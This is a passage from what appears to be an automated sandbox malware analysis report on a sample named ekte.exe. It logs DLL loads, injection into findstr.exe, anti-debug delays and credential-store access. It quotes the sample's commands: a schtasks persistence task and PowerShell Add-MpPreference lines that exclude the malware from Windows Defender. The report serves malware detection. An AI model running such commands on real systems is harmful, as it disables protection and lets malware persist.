            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: mozglue.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wdscore.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptui.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: riched32.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: riched20.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
            Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Windows\SysWOW64\RichEd32.dll
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\ekte.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: ekte.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ekte.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs .Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
            Source: sqlite3.dll.19.dr Static PE information: section name: /4
            Source: sqlite3.dll.19.dr Static PE information: section name: /19
            Source: sqlite3.dll.19.dr Static PE information: section name: /31
            Source: sqlite3.dll.19.dr Static PE information: section name: /45
            Source: sqlite3.dll.19.dr Static PE information: section name: /57
            Source: sqlite3.dll.19.dr Static PE information: section name: /70
            Source: sqlite3.dll.19.dr Static PE information: section name: /81
            Source: sqlite3.dll.19.dr Static PE information: section name: /92
            Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00402145 pushad ; retf 8_2_00402170
            Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0041423E push ebp; retf 8_2_0041423F
            Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004032E0 push eax; ret 8_2_004032E2
            Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004142F0 pushad ; iretd 8_2_004142F3
            Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0041163E push cs; retf 8_2_0041164B
            Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BDFA1 push ecx; ret 8_2_009BDFB4
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 18_2_0042D8CA pushad ; ret 18_2_0042D8CB
            Source: ekte.exe Static PE information: section name: .text entropy: 7.8327880515520985
            Source: eFDiSxeTfjUqTk.exe.0.dr Static PE information: section name: .text entropy: 7.8327880515520985
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, 0.2.ekte.exe.3ae7ae0.5.raw.unpack, 0.2.ekte.exe.3b6fb00.4.raw.unpack High entropy of concatenated method names
            Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
            Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe

            Boot Survival

            Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
            Source: C:\Users\user\Desktop\ekte.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 9980000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 9B80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: AB80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 2330000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 6D30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 7D30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 7ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A00101 rdtsc 8_2_00A00101
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ekte.exeWindow / User API: threadDelayed 3610Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeWindow / User API: threadDelayed 1842Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1124Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2092Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1635Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1269Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeWindow / User API: threadDelayed 2429Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeWindow / User API: threadDelayed 2434Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1752
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1740
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2029
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1034
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 9747Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 1.8 %
            Source: C:\Users\user\Desktop\ekte.exe TID: 3480Thread sleep time: -21213755684765971s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3480Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3480Thread sleep time: -540000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3724Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3420Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 1124 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 2092 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\taskeng.exe TID: 3860Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -360000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3164Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3880Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep count: 212 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep time: -424000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 1332Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep count: 9747 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep time: -19494000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe TID: 2244Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E183F0 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,19_2_61E183F0
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A00101 rdtsc 8_2_00A00101
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk,8_2_009B07AC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009A0080 mov ecx, dword ptr fs:[00000030h]8_2_009A0080
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009A00EA mov eax, dword ptr fs:[00000030h]8_2_009A00EA
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C26F8 mov eax, dword ptr fs:[00000030h]8_2_009C26F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryInformationProcess: Direct from: 0x774CFAFA
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateKey: Direct from: 0x774CFB62
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQuerySystemInformation: Direct from: 0x774D20DE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateFile: Direct from: 0x774D00D6
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetTimer: Direct from: 0x774D021A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenFile: Direct from: 0x774CFD86
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationThread: Direct from: 0x774E9893
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenKeyEx: Direct from: 0x774CFA4A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtResumeThread: Direct from: 0x774D008D
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenKeyEx: Direct from: 0x774D103A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtDelayExecution: Direct from: 0x774CFDA1
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationProcess: Direct from: 0x774CFB4A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationThread: Direct from: 0x774CF9CE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtReadFile: Direct from: 0x774CF915
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtMapViewOfSection: Direct from: 0x774CFC72
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateThreadEx: Direct from: 0x774D08C6
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtDeviceIoControlFile: Direct from: 0x774CF931
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryValueKey: Direct from: 0x774CFACA
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenSection: Direct from: 0x774CFDEA
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtProtectVirtualMemory: Direct from: 0x774D005A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
